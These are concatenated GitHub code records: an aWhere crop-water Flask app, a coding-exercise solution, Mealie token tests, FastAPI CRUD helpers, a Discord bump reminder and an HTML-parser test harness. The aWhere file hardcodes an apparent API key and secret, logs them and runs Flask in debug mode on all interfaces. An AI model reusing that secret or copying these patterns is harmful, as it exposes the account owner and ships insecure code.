'https://api.awhere.com/v2/agronomics/fields/' + self.FIELD + '/agronomicnorms/' + self.START_DT + ',' + self.END_DT + '/?limit=1&offset=' + self.NUM_OF_DAYS\n self._forecasts_url = 'https://api.awhere.com/v2/weather/fields/' + self.FIELD + '/forecasts/' + self.THIS_DT\n self.api_key = 'r4AGIfSxMlQNkUPxQGgLx7kpIKovQCMI'\n self.api_secret = 'S9nipeJJ6AVLmRdG'\n self.base_64_encoded_secret_key = self.encode_secret_and_key(self.api_key, self.api_secret)\n self.auth_token = self.get_oauth_token(self.base_64_encoded_secret_key)\n\n def number_of_days(self):\n startDate = date(2018, int(self.START_DT[0:2]), int(self.START_DT[3:5]))\n endDate = date(2018, int(self.END_DT[0:2]), int(self.END_DT[3:5]))\n numOfDays = endDate - startDate\n numOfDaysStr = str(numOfDays)[0:str(numOfDays).find(' ')+1]\n print('\\nnumber_of_days:: numOfDaysStr: %s' % numOfDaysStr)\n sys.stdout.flush()\n return numOfDaysStr\n\n def encode_secret_and_key(self, key, secret):\n \"\"\"\n Docs:\n http://developer.awhere.com/api/authentication\n Returns:\n Returns the base64-encoded {key}:{secret} combination, seperated by a colon.\n \"\"\"\n # Base64 Encode the Secret and Key\n key_secret = '%s:%s' % (key, secret)\n print('\\nKey and Secret before Base64 Encoding: %s' % key_secret)\n sys.stdout.flush()\n encoded_key_secret = base64.b64encode(bytes(key_secret,\n 'utf-8')).decode('ascii')\n print('Key and Secret after Base64 Encoding: %s' % encoded_key_secret)\n sys.stdout.flush()\n return encoded_key_secret\n\n def get_oauth_token(self, encoded_key_secret):\n \"\"\"\n Demonstrates how to make a HTTP POST request to obtain an OAuth Token\n Docs: \n http://developer.awhere.com/api/authentication\n Returns: \n The access token provided by the aWhere API\n \"\"\"\n auth_url = 'https://api.awhere.com/oauth/token'\n auth_headers = {\n \"Authorization\": \"Basic %s\" % encoded_key_secret,\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n body = \"grant_type=client_credentials\"\n print('\\nget_oauth_token:: Headers: %s' % auth_headers)\n sys.stdout.flush()\n print('\\nget_oauth_token:: Body: %s' % body)\n sys.stdout.flush()\n response = rq.post(auth_url, headers=auth_headers, data=body)\n # .json method is a requests lib method that decodes the response\n responseJSON = response.json()\n print('\\nget_oauth_token:: ResponseJSON: %s' % responseJSON)\n sys.stdout.flush()\n return responseJSON['access_token']\n\n def get_agronomic_url_today(self):\n \"\"\"\n Performs a HTTP GET request to obtain Agronomic Norms\n Docs: \n 1. Agronomic: https://developer.awhere.com/api/reference/agronomics/norms\n \"\"\"\n # Setup the HTTP request headers\n auth_headers = {\n \"Authorization\": \"Bearer %s\" % self.auth_token,\n }\n print('\\nget_agronomic_url_today:: Headers: %s' % auth_headers)\n sys.stdout.flush()\n\t\n # Perform the HTTP request to obtain the Agronomic Norms for the Field\n response = rq.get(self._agronomic_url, headers=auth_headers)\n responseJSON = response.json()\n print('\\nget_agronomic_url_today:: ResponseJSON: %s' % responseJSON)\n sys.stdout.flush()\n\t\n todayDailyNorm = responseJSON[\"dailyNorms\"][0]\n accGDD = todayDailyNorm[\"accumulatedGdd\"][\"average\"]\n pet = todayDailyNorm[\"pet\"][\"average\"]\n potentialRatio = todayDailyNorm[\"ppet\"][\"average\"]\n precipitation = pet * potentialRatio\n waterRequirements = float(\"{0:.2f}\".format(pet - precipitation))\n print('\\nget_agronomic_url_today:: precipitation: %f' % precipitation)\n sys.stdout.flush()\n print('\\nget_agronomic_url_today:: waterRequirements: %f' % waterRequirements)\n sys.stdout.flush()\n\t\n response2 = rq.get(self._forecasts_url, headers=auth_headers)\n response2JSON = response2.json()\n print('\\nget_agronomic_url_today:: Response2JSON: %s' % response2JSON)\n\t\n forecast = response2JSON['forecast']\n condition = forecast[0]['conditionsText']\n if condition.find('No Rain') >= 0:\n rainy = False\n\t\n #if crop is cotton\n if self.CROP == 'cotton':\n if accGDD>=0 and accGDD <28:\n resultGrowthStage = 'planted'\n elif accGDD >= 28 and accGDD < 306:\n resultGrowthStage = \"emergence\"\n elif accGDD >= 306 and accGDD < 528:\n resultGrowthStage = \"first-square\"\n elif accGDD >= 528 and accGDD < 1194:\n resultGrowthStage = \"first-flower\"\n elif accGDD >= 1194 and accGDD < 1444:\n resultGrowthStage = \"open-bolli\"\n elif accGDD >= 1444:\n resultGrowthStage = \"harvest\"\n\n #if crop is corn\n if self.CROP == 'corn':\n if accGDD>=0 and accGDD <65:\n resultGrowthStage = 'planted'\n elif accGDD >= 65 and accGDD < 740:\n resultGrowthStage = \"emergence\"\n elif accGDD >= 740 and accGDD < 1135:\n resultGrowthStage = \"rapid growth\"\n elif accGDD >= 1135 and accGDD < 1160:\n resultGrowthStage = \"pollination\"\n elif accGDD >= 1160 and accGDD < 1660:\n resultGrowthStage = \"grain fill\"\n elif accGDD >= 1660:\n resultGrowthStage = \"harvest\"\n\n if (potentialRatio < 1) & (not rainy):\n return 'Today\\'s date is ' + self.END_DT + '. Your water requirements for your ' + self.CROP + ' crops are: ' + str(waterRequirements) + ' mm. Your crops\\' growth stage is ' + resultGrowthStage + '.'\n else:\n return 'Today\\'s date is ' + self.END_DT + '. Your ' + self.FIELD + ' crops\\' growth stage is ' + resultGrowthStage + '. Do not water your crops.'\n\nif __name__ == '__main__':\n port = int(os.getenv('PORT', 5000))\n\n print(\"Starting app on port %d\" % port)\n\n app.run(debug=True, port=port, host='0.0.0.0', threaded=True)\n","repo_name":"yuvanshu/GDDandPET","sub_path":"app-awhere.py","file_name":"app-awhere.py","file_ext":"py","file_size_in_byte":9583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74509097763","text":"from collections import deque\n\n\ndef solution(new_id):\n answer = ''\n answer1 = ''\n answer2 = ''\n answer3 = ''\n new_id = list(new_id)\n # 첫번째조건 대문자 -> 소문자\n for i in range(len(new_id)):\n x = ord(new_id[i])\n if 65 <= x <= 90:\n answer += chr(x + 32)\n elif x == 45 or x == 46 or x == 95 or 97 <= x <= 122:\n answer += new_id[i]\n\n elif 48 <= x <= 57:\n answer += new_id[i]\n\n answer = list(answer)\n flag = 0\n for i in range(len(answer)):\n if answer[i] == '.':\n if flag:\n continue\n else:\n answer1 += answer[i]\n flag = 1\n else:\n answer1 += answer[i]\n flag = 0\n\n if len(answer1) > 2 and answer[0] == '.' and answer[-1] == '.':\n answer1 = answer1[1:-1]\n elif answer[0] == '.':\n answer1 = answer1[1:]\n elif answer[-1] == '.':\n answer1 = answer1[:-1]\n elif len(answer1) == 1 and answer1[0] == '.':\n answer1 = ''\n\n print(\"answer1\", answer1)\n\n if len(answer1) == 0:\n answer1 = 'a'\n\n if len(answer1) >= 16:\n for i in range(16):\n answer2 = answer1[:15]\n\n elif len(answer1) <= 2:\n answer2 += answer1\n for i in range(3 - len(answer1)):\n answer2 += answer1[-1]\n else:\n answer2 = answer1\n\n if len(answer2) > 2 and answer2[-1] == '.':\n answer2 = answer2[:-1]\n\n print(\"answer2\", answer2)\n return answer2","repo_name":"young0264/hellopycharm","sub_path":"프로그래머스/신규아이디추천.py","file_name":"신규아이디추천.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"192917244","text":"import json\n\nfrom fastapi.testclient import TestClient\nfrom pytest import fixture\n\nfrom tests.utils import api_routes\n\n\n@fixture\ndef long_live_token(api_client: TestClient, admin_token):\n response = api_client.post(api_routes.users_api_tokens, json={\"name\": \"Test Fixture Token\"}, headers=admin_token)\n assert response.status_code == 201\n\n return {\"Authorization\": f\"Bearer {json.loads(response.text).get('token')}\"}\n\n\ndef test_api_token_creation(api_client: TestClient, admin_token):\n response = api_client.post(api_routes.users_api_tokens, json={\"name\": \"Test API Token\"}, headers=admin_token)\n assert response.status_code == 201\n\n\ndef test_use_token(api_client: TestClient, long_live_token):\n response = api_client.get(api_routes.users, headers=long_live_token)\n\n assert response.status_code == 200\n\n\ndef test_delete_token(api_client: TestClient, admin_token):\n response = api_client.delete(api_routes.users_api_tokens_token_id(1), headers=admin_token)\n assert response.status_code == 200\n\n response = api_client.delete(api_routes.users_api_tokens_token_id(2), headers=admin_token)\n assert response.status_code == 200\n","repo_name":"mealie-recipes/mealie","sub_path":"tests/integration_tests/user_tests/test_user_api_token.py","file_name":"test_user_api_token.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":3977,"dataset":"github-code","pt":"52"} +{"seq_id":"28983586427","text":"from sqlalchemy.orm import Session\nfrom sqlalchemy import String\n\nfrom . import models, schemas\n\n\ndef get_user(db: Session, user_id: int):\n return db.query(models.User).filter(models.User.id == user_id).first()\n\n\ndef get_user_by_email(db: Session, email: str):\n return db.query(models.User).filter(models.User.email == email).first()\n\n\ndef get_users(db: Session, skip: int = 0, limit: int = 100):\n return db.query(models.User).offset(skip).limit(limit).all()\n\n\ndef create_user(db: Session, user: schemas.UserCreate):\n #fake_hashed_password = user.password + \"notreallyhashed\"\n db_user = models.User(email=user.email, first_name=user.first_name,\n last_name=user.last_name, gender=user.gender)\n db.add(db_user)\n db.commit()\n db.refresh(db_user)\n return db_user\n\n\ndef create_items(db: Session, itemName: str):\n db_items = models.Item(produto=itemName)\n db.add(db_items)\n db.commit()\n db.refresh(db_items)\n return db_items\n\n\ndef get_item(db: Session, item_id: int):\n item = db.query(models.Item).filter(models.Item.id == item_id).first()\n return item\n\n\ndef get_items(db: Session, skip: int = 0, limit: int = 100):\n item = db.query(models.Item).offset(skip).limit(limit).all()\n return item\n\n\ndef create_user_item(db: Session, item_id: int, user_id: int, quantidade: int):\n user = get_user(db, user_id)\n if(not user):\n return \"Usario nao encontrado\"\n item = get_item(db, item_id)\n if(not item):\n return \"Produto nao encontrado\"\n db_item = models.User_Item(\n produto_id=item_id, owner_id=user_id, quantidade=quantidade)\n db.add(db_item)\n db.commit()\n db.refresh(db_item)\n return db_item\n\n\ndef get_carrinho_per_user(db: Session, user_id: int):\n\n if db.query(models.User_Item).filter(models.User_Item.owner_id == user_id).first() == None:\n return \"Nenhum carrinho com este id\"\n else:\n carrinho = db.query(models.User_Item).filter(models.User_Item.owner_id == user_id).all()\n if not carrinho:\n return \"Carrinho esta vazio\"\n else: \n return carrinho\n\n\ndef delete_item_carrinho(db: Session, user_id: int, product_id: int):\n\n usuario = db.query(models.User).filter(models.User.id == user_id).first()\n\n prod = db.query(models.Item).filter(models.Item.id == product_id).first()\n\n # print(\"Entrou\")\n\n if usuario == None:\n return \"Nenhum usuário com este id\"\n\n elif prod == None:\n return \"Nenhum produto com este id\"\n\n else:\n linhaUsuarioItem = db.query(models.User_Item).filter(\n models.User_Item.produto_id == product_id and models.User_Item.owner_id == user_id).first()\n\n db.delete(linhaUsuarioItem)\n db.commit()\n\n return \"Deletado com sucesso\"\n\ndef delete_item(db: Session, product_id: int):\n\n prod = db.query(models.Item).filter(models.Item.id == product_id).first()\n\n # print(\"Entrou\")\n\n if prod == None:\n return \"Nenhum produto com este id\"\n\n else:\n linhaUsuarioItem = db.query(models.User_Item).filter(models.User_Item.produto_id == product_id).all()\n print(linhaUsuarioItem)\n for i in linhaUsuarioItem:\n db.delete(i)\n db.commit()\n db.delete(prod)\n db.commit()\n return \"Deletado com sucesso\"\n","repo_name":"TheoBR00/Projeto_final_cloud","sub_path":"Projeto_cloud/app/sql_app2/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39851708467","text":"import asyncio\nimport datetime\nimport logging\nimport traceback\nimport discord\n\nfrom discord.ext import commands, tasks\nfrom Extensions.Statistics import log_event\n\nfrom Globals.GlobalVariables import bot, on_log\nfrom Extensions.Settings import fetch_setting\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nlogger.addFilter(on_log)\n\ndef setup(bot):\n bot.add_cog(BumpReminder())\n\nclass BumpReminder(commands.Cog, name='Bump Reminder'):\n\n def __init__(self):\n self.bump_reminder_tasks = {}\n self.bump_reminder_starter.start()\n\n #Run on bot startup\n async def bump_task_start(self, guild):\n\n #Find last \"bump success\" message\n def bump_message_check(message):\n return (message.author.id == 302050872383242240 and hasattr(message, 'embeds') and \"Bump done!\" in message.embeds[0].description)\n\n def bump_remind_check(message):\n return (message.author.id == bot.user.id and hasattr(message, 'embeds') and \"Bump the server\" in message.embeds[0].description)\n\n bump_message = await self.get_message(guild, bump_message_check)\n\n if bump_message == None:\n logger.info(\"Bump message was empty, reminding now\")\n bot.loop.create_task(self.bump_reminder_task(0, guild.id))\n return\n\n time_since_bump = datetime.datetime.now(datetime.timezone.utc) - bump_message.created_at\n logger.info(f\"Time since bump is {time_since_bump}\")\n\n time_until_bump = datetime.timedelta(hours= 2) - time_since_bump\n\n bump_remind_message = await self.get_message(guild, bump_remind_check)\n\n if bump_remind_message is None:\n time_since_bump_remind = -1\n else:\n time_since_bump_remind = datetime.datetime.now(datetime.timezone.utc) - bump_remind_message.created_at\n\n if bump_remind_message != None and (bump_remind_message.created_at - bump_message.created_at).total_seconds() > 0 and not time_since_bump_remind.total_seconds() > 7200: \n logger.info(f\"Cancelling remind task and waiting because reminder was sent after last bump success and within two hours\")\n self.bump_reminder_tasks[guild.id] = False\n return\n\n #Start async task waiting for time until next bump\n bot.loop.create_task(self.bump_reminder_task(time_until_bump.total_seconds(), guild.id))\n self.bump_reminder_tasks[guild.id] = True\n\n\n async def get_message(self, guild, search):\n\n #Get channel\n channel = await bot.fetch_channel(fetch_setting(guild.id, 'bump_channel'))\n\n try: \n message = await channel.history(limit=50).find(search)\n \n if message == None:\n message = await channel.history(limit=150).find(search)\n\n if message == None:\n message = await channel.history(limit=1500).find(search)\n\n if message == None:\n logger.info(f'Could not find bump message within 1500 messages for {guild.name}/{channel.name}')\n except Exception as e:\n message = None\n logger.error(f'Failed to get bump message for {guild.name}/{channel.name}', exc_info=True)\n\n return message\n\n #Make bump message\n def get_reminder_embed(self):\n embed = discord.Embed(title= \"⋅•⋅⊰∙∘☽ Its bump time! ☾∘∙⊱⋅•⋅\", description= \"Bump the server with `/bump`!\", color= 7528669)\n embed.set_thumbnail(url=bot.user.avatar.url)\n return embed\n\n #Async tasks\n async def bump_reminder_task(self, waitTime, guild_id):\n if waitTime < 0: waitTime = 0\n await asyncio.sleep(waitTime) #Sleep for waitTime seconds\n #...zzz...\n bump_channel_id = fetch_setting(guild_id, 'bump_channel')\n bump_role_id = fetch_setting(guild_id, 'bump_role')\n channel = await bot.fetch_channel(bump_channel_id) #Get channel\n await channel.send(embed= self.get_reminder_embed(), content= f\"<@&{bump_role_id}>\" if bump_role_id is not None else '') #Send reminder\n log_event('bump_reminded', modes=['global', 'guild'], id=guild_id)\n self.bump_reminder_tasks[guild_id] = False #Set task running to False\n\n @tasks.loop(minutes=15)\n async def bump_reminder_starter(self):\n try:\n async for guild in bot.fetch_guilds():\n if fetch_setting(guild.id, 'bump_channel') is None: continue\n if guild.id not in self.bump_reminder_tasks.keys(): self.bump_reminder_tasks[guild.id] = False\n if not self.bump_reminder_tasks[guild.id]:\n try:\n await self.bump_task_start(guild) #Start new task\n logger.info(f\"Bump reminder task started for guild {guild.name}\")\n except discord.errors.Forbidden:\n pass\n except Exception as e:\n logger.error(f'Reminder task failed to start for {guild.name}', exc_info=True) #If something goes wrong, just wait and try restarting again later\n except Exception as e:\n logger.error(f'Reminder task starter has failed. Trying again in 15 minutes', exc_info=True) #If something goes wrong, just wait and try restarting again later\n\n @bump_reminder_starter.before_loop\n async def before_bump(self):\n logger.info('Starting bump loop...')\n await bot.wait_until_ready()\n","repo_name":"SuperSmay/Elliot","sub_path":"Extensions/BumpReminder.py","file_name":"BumpReminder.py","file_ext":"py","file_size_in_byte":5432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34894544100","text":"import pprint\nimport htmlparser\nimport filegenerator\nimport userinput\nimport main\nimport dbhandler\nimport structures\n\n####################################################################################################\n# htmlparser.py tests\n####################################################################################################\n\ndef test_find_all_classes(html_filename):\n ## Test with class\n print(\"\\n#####################################################################################\")\n print(\"Test to find all classes in a .html file\")\n html_string = filegenerator.file_to_string(html_filename)\n\n test = htmlparser.get_class_names(html_string)\n print(test)\n return None\n\n####################################################################################################\n\ndef test_find_all_tags(html_filename):\n ## Test with tags\n print(\"\\n#####################################################################################\")\n print(\"Test to find all tags in a .html file\")\n html_string = filegenerator.file_to_string(html_filename)\n \n test = htmlparser.get_tag_names(html_string)\n print(test)\n return None\n\n\n####################################################################################################\n\ndef test_extract_tags_classes_exact(file, tag, class_):\n print(\"\\n#####################################################################################\")\n print(\"Testing exact tag and class extraction\")\n print(\"\\n1. Both tag and class:\")\n htmlparser.extract_tags_classes_exact(file, tag, class_)\n \n print(\"\\n2. Tag but no class:\")\n htmlparser.extract_tags_classes_exact(file, tag, \"\")\n\n print(\"\\n3. Class but no tag:\")\n htmlparser.extract_tags_classes_exact(file, \"\", class_)\n\n print(\"\\n4. No tag and no class:\")\n htmlparser.extract_tags_classes_exact(file, \"\", \"\") \n\n return None\n\n####################################################################################################\n\ndef test_extract_tags_classes_approximate(file, tag, class_): \n print(\"\\n#####################################################################################\")\n print(\"Testing approximate tag and class extraction\")\n print(\"\\n1. Both tag and class:\")\n htmlparser.extract_tags_classes_approximate(file, tag, class_)\n \n print(\"\\n2. Tag but no class:\")\n htmlparser.extract_tags_classes_approximate(file, tag, \"\")\n\n print(\"\\n3. Class but no tag:\")\n htmlparser.extract_tags_classes_approximate(file, \"\", class_)\n\n print(\"\\n4. No tag and no class:\")\n htmlparser.extract_tags_classes_approximate(file, \"\", \"\") \n\n return None\n\n\n####################################################################################################\n# main.py tests\n####################################################################################################\n\n# Possible user inputs\nSOURCETYPE_INPUTS = (#(\"file\" , \"alice.html\"),\n (\"folder\" , r\"C:\\Temp\"),\n #(\"website\" , \"\"),\n #(\"database\", \"\")\n )\nSEARCHTYPE_INPUTS = (\"Exact\",\n #\"Approximate\",\n #\"All\",\n #\"List\"\n )\nTAG_INPUTS = (#(\"\",),\n #(\"title\",),\n (\"p\",),\n #(\"a\",),\n #(\"title\", \"head\")\n )\nCLASS__INPUTS = ((\"\",),\n #(\"story\",),\n #(\"tory\",),\n #(\"story\", \"tory\"),\n )\nOUTPUTTYPE_INPUTS = (#(\".html report\", \"output\"),\n (\"abridged\", \"output\"),\n #(\".pdf\", \"output\"),\n #(\"current.sqlite\", \"output.sqlite\"),\n #(\"fresh.sqlite\", \"output\"),\n )\n\n# Simulated user input through the generation of several dictionaries\ndef user_input_simulation (sourcetypes,\n searchtypes,\n tags ,\n classes ,\n outputtypes,\n ):\n \"\"\"\n Input: Tuples with possible inputs by the user.\n Output: List with dictionaries representing possible user input.\n \"\"\"\n output_list = []\n \n for sourcetype in sourcetypes:\n for tag in tags:\n for class_ in classes:\n for searchtype in searchtypes:\n for outputtype in outputtypes:\n if searchtype == \"All\" and (class_ != (\"\",) or tag != (\"\",)): \n True # Exclude incongruent choice\n elif searchtype != \"All\" and (tag == (\"\",) and class_ == (\"\",)):\n True # Exclude incongruent choice\n else:\n output_list.append({\"sourcetype\": sourcetype,\n \"tag\" : tag,\n \"class_\" : class_,\n \"searchtype\": searchtype,\n \"outputtype\": outputtype\n })\n \n print(\"Generated {0} possible user inputs\".format(len(output_list)))\n\n return output_list\n\n####################################################################################################\n\ndef test_main():\n \"\"\"\n Uses simulated input to create multiple search patterns\n \"\"\"\n print(\"\\n#####################################################################################\")\n print(\"Testing valid user search requests\")\n test = user_input_simulation(SOURCETYPE_INPUTS,\n SEARCHTYPE_INPUTS,\n TAG_INPUTS,\n CLASS__INPUTS,\n OUTPUTTYPE_INPUTS,\n )\n for condition in test: print(condition)\n \n for condition in test:\n index = test.index(condition) + 1\n print(\"\\n\\nTest\", index, \"/\", len(test), condition)\n result = main.main(condition)\n print(type(result), len(result))\n pprint.pprint(result)\n return None\n \n\n####################################################################################################\n# filegenerator.py tests\n####################################################################################################\n\nTEXT = \"sampletest.txt\"\nCLASSES = \"classlist.txt\"\nTAGS = \"taglist.txt\"\n\ndef test_filegenerator():\n print(\"\"\"\n TEXT = \"sampletest.txt\"\n CLASSES = \"classlist.txt\"\n TAGS = \"taglist.txt\"\n \"\"\")\n test = filegenerator.txt_to_list(CLASSES)\n print(type(test))\n test = filegenerator.txt_to_list(TAGS)\n print(type(test))\n\n return None\n\n####################################################################################################\n# userinput.py tests\n####################################################################################################\n\ndef test_userinput():\n pprint.pprint(userinput.choose_primary_mode())\n\n\n####################################################################################################\n# dbhandler.py tests\n####################################################################################################\n\nMY_DICT = {\"001\": {\"Name\": \"Ann\" , \"Age\": 0, \"Russian\": True },\n \"002\": {\"Name\": \"Maya\" , \"Age\": 86, \"Russian\": False},\n \"003\": {\"Name\": \"John\" , \"Age\": 90, \"Russian\": False},\n \"004\": {\"Name\": \"Nadia\" , \"Age\": 87, \"Russian\": True },\n \"005\": {\"Name\": \"Russell\", \"Age\": 77, \"Russian\": False},\n \"006\": {\"Name\": \"Hiroko\" , \"Age\": 60, \"Russian\": False},\n \"007\": {\"Name\": \"Arkady\" , \"Age\": 71, \"Russian\": True },\n }\nMY_DICTALT = {\"001\": {\"Name\": \"Ann\" , \"Age\": 88, \"Russian\": True },\n \"002\": {\"Name\": \"Maya\" , \"Age\": 86, \"Russian\": False},\n \"003\": {\"Name\": \"John\" , \"Age\": 90, \"Russian\": False},\n \"004\": {\"Name\": \"Nadia\" , \"Age\": 87, \"Russian\": True },\n \"005\": {\"Name\": \"Russell\", \"Age\": 77, \"Russian\": False},\n \"006\": {\"Name\": \"Hiroko\" , \"Age\": 60, \"Russian\": False},\n \"008\": {\"Name\": \"Kasei\" , \"Age\": 25, \"Russian\": False},\n }\nMY_SQLFILENAME = \"martians.sqlite\"\nMY_SQLTABLE = \"First_Hundred\"\n\nHTMLDICT = {'alice - Copie.html': [{'class': ['story'],\n 'contents': '

Once upon a time there were three little sisters; and their names were Elsie, Lacie and Tillie; and they lived at the bottom of a well.

',\n 'source': 'C:\\\\Temp\\\\alice - Copie.html',\n 'tag': 'p'},\n {'class': ['story'],\n 'contents': '

...

',\n 'source': 'C:\\\\Temp\\\\alice - Copie.html',\n 'tag': 'p'}],\n 'alice.html': [{'class': ['story'],\n 'contents': '

Once upon a time there were three little sisters; and their names were Elsie, Lacie and Tillie; and they lived at the bottom of a well.

',\n 'source': 'C:\\\\Temp\\\\alice.html',\n 'tag': 'p'},\n {'class': ['story'],\n 'contents': '

...

',\n 'source': 'C:\\\\Temp\\\\alice.html',\n 'tag': 'p'}]}\n\nHTMLDICT2 = {'alice - Copie.html': [{'class': \"['title']\",\n 'contents': '

The Dormouse\\'s '\n 'story

',\n 'file_index': 0,\n 'given_path': 'C:\\\\Temp\\\\alice - Copie.html',\n 'href': None,\n 'pos_index': 4,\n 'tag': 'p'},\n {'class': \"['story']\",\n 'contents': '

Once upon a time there '\n 'were three little sisters; and their '\n 'names were Elsie, Lacie and Tillie; and they lived '\n 'at the bottom of a well.

',\n 'file_index': 0,\n 'given_path': 'C:\\\\Temp\\\\alice - Copie.html',\n 'href': None,\n 'pos_index': 6,\n 'tag': 'p'},\n {'class': \"['story']\",\n 'contents': '

...

',\n 'file_index': 0,\n 'given_path': 'C:\\\\Temp\\\\alice - Copie.html',\n 'href': None,\n 'pos_index': 10,\n 'tag': 'p'}],\n 'alice.html': [{'class': \"['title']\",\n 'contents': '

The Dormouse\\'s '\n 'story

',\n 'file_index': 1,\n 'given_path': 'C:\\\\Temp\\\\alice.html',\n 'href': None,\n 'pos_index': 4,\n 'tag': 'p'},\n {'class': \"['story']\",\n 'contents': '

Once upon a time there were '\n 'three little sisters; and their names were Elsie, Lacie and Tillie; and they lived at the '\n 'bottom of a well.

',\n 'file_index': 1,\n 'given_path': 'C:\\\\Temp\\\\alice.html',\n 'href': None,\n 'pos_index': 6,\n 'tag': 'p'},\n {'class': \"['story']\",\n 'contents': '

...

',\n 'file_index': 1,\n 'given_path': 'C:\\\\Temp\\\\alice.html',\n 'href': None,\n 'pos_index': 10,\n 'tag': 'p'}]}\n\n####################################################################################################\n\ndef test_instruction_typing(input_dict):\n\n print(\"Testing categorizing fields in a nested dictionary...\")\n print(dbhandler.dictfieldnames_to_tuplist(input_dict))\n print(\"The previous line should show a list of tuples describing database fields.\")\n print(\"\")\n \n print(\"Testing categorizing fields in a nested dictionary...\")\n print(dbhandler.dictfields_to_string(input_dict))\n print(\"The previous line should show a tuple of strings describing database fields.\")\n print(\"\")\n \n return None\n\n####################################################################################################\n\ndef test_manipulation(input_dict, sqlfilename, sqltable):\n print(\"Testing table creation from a nested dictionary...\")\n dbhandler.create_table(input_dict, sqlfilename, sqltable)\n print(\"\")\n \n print(\"Testing data insertion in database...\")\n dbhandler.add_dbrows(MY_DICT, MY_SQLFILENAME, MY_SQLTABLE)\n print(\"\")\n\n print(\"Testing simple key comparison between a dictionary and a database created from that same dictionary...\")\n dbhandler.compare_keysonly(MY_DICT, MY_SQLFILENAME, MY_SQLTABLE)\n\n print(\"Testing simple key comparison between a dictionary and a database created from another dictionary...\")\n dbhandler.compare_keysonly(MY_DICTALT, MY_SQLFILENAME, MY_SQLTABLE)\n\n print(\"Testing full key comparison between a dictionary and a database created from that same dictionary...\")\n dbhandler.compare_keysfull(MY_DICT, MY_SQLFILENAME, MY_SQLTABLE)\n\n print(\"Testing full key comparison between a dictionary and a database created from another dictionary...\")\n dbhandler.compare_keysfull(MY_DICTALT, MY_SQLFILENAME, MY_SQLTABLE)\n\n print(\"Testing row comparison between a dictionary and a database created from that same dictionary...\")\n dbhandler.compare_rowsfull(MY_DICT, MY_SQLFILENAME, MY_SQLTABLE)\n\n print(\"Testing row comparison between a dictionary and a database created from another dictionary...\")\n dbhandler.compare_rowsfull(MY_DICTALT, MY_SQLFILENAME, MY_SQLTABLE)\n\n print(\"Testing updating database from changes in dictionary...\")\n dbhandler.update_dict_to_db(MY_DICTALT, MY_SQLFILENAME, MY_SQLTABLE)\n \n return None\n\n####################################################################################################\n\ndef test_structures(input_dict):\n \n print(\"Testing conversion of a structure of the form dictionary → list to dictionary → dictionary\")\n converted = structures.dictlist_to_dictdict(input_dict)\n pprint.pprint(converted)\n print(\"\")\n\n print(\"Testing conversion of a structure of the form dictionary → list to dictionary → dictionary,\")\n print(\"while changing the key\")\n converted = structures.dictlist_to_dictdict(input_dict, \"tag\")\n pprint.pprint(converted)\n print(\"\")\n\n print(\"Flattening a structure of the form dictionary → dictionary → dictionary to dictionary → dictionary\")\n flattened = structures.flatten_dictdictdict(converted)\n pprint.pprint(flattened)\n print(\"\")\n \n return None\n\n####################################################################################################\n# RUN ALL TESTS\n####################################################################################################\n## Uncomment to test:\n\n## Test actual script\n#pprint.pprint(main.main(\"\"))\nmain.main(\"\")\n\n# htmlparser.py tests\nALICE = \"alice.html\"\n#test_find_all_classes(ALICE)\n#test_find_all_tags(ALICE)\n#test_extract_tags_classes_exact(ALICE,\"p\",\"story\")\n#test_extract_tags_classes_approximate(ALICE,\"p\",\"tory\")\n\n# main.py tests\n#test_main()\n\n# filegenerator.py tests\n#test_filegenerator()\n#filegenerator.htmldict_to_css(HTMLDICT2, \"output.html\")\n\n# userinput.py tests\n#test_userinput()\n\n# dbhandler.py tests\n#test_instruction_typing(MY_DICT)\n#test_manipulation(MY_DICT, MY_SQLFILENAME, MY_SQLTABLE)\n\n# structures.py tests\n#test_structures(HTMLDICT)\n#test_structures(HTMLDICT2)\n\n","repo_name":"josegarban/htmlcopier","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":17656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29826323172","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport os\nimport cv2\nimport torch\nimport numpy as np\n\nfrom pysot.core.config import cfg\nfrom pysot.models.utile_tctrack.model_builder import ModelBuilder_tctrack\nfrom pysot.models.utile_tctrackplus.model_builder import ModelBuilder_tctrackplus\nfrom pysot.tracker.tctrack_tracker import TCTrackTracker\nfrom pysot.tracker.tctrackplus_tracker import TCTrackplusTracker\nfrom pysot.utils.bbox import get_axis_aligned_bbox\nfrom pysot.utils.model_load import load_pretrain\nfrom toolkit.datasets import DatasetFactory\n\n\nparser = argparse.ArgumentParser(description='TCTrack tracking')\nparser.add_argument('--dataset', default='OTB100',type=str,\n help='datasets')\nparser.add_argument('--tracker_name', default='TCTrack', type=str,\n help='tracker name')\nparser.add_argument('--snapshot', default='./tools/snapshot/checkpoint00_e88.pth', type=str,\n help='snapshot of models to eval')\nparser.add_argument('--video', default='', type=str,\n help='eval one special video')\nparser.add_argument('--vis', default='',action='store_true',\n help='whether visualzie result')\nargs = parser.parse_args()\n\ntorch.set_num_threads(1)\n\ndef main():\n# load config\n if args.tracker_name==\"TCTrack\":\n if args.dataset in ['UAV123','UAV123_10fps','DTB70']:\n cfg.merge_from_file(os.path.join('./experiments', args.tracker_name, 'config.yaml'))\n else:\n cfg.merge_from_file(os.path.join('./experiments', args.tracker_name, 'config_l.yaml'))\n # create model\n model = ModelBuilder_tctrack('test')\n\n # load model\n model = load_pretrain(model, args.snapshot).cuda().eval()\n\n # build tracker\n tracker = TCTrackTracker(model)\n hp=[cfg.TRACK.PENALTY_K,cfg.TRACK.WINDOW_INFLUENCE,cfg.TRACK.LR]\n \n elif args.tracker_name==\"TCTrack++\":\n cfg.merge_from_file(os.path.join('./experiments', args.tracker_name, 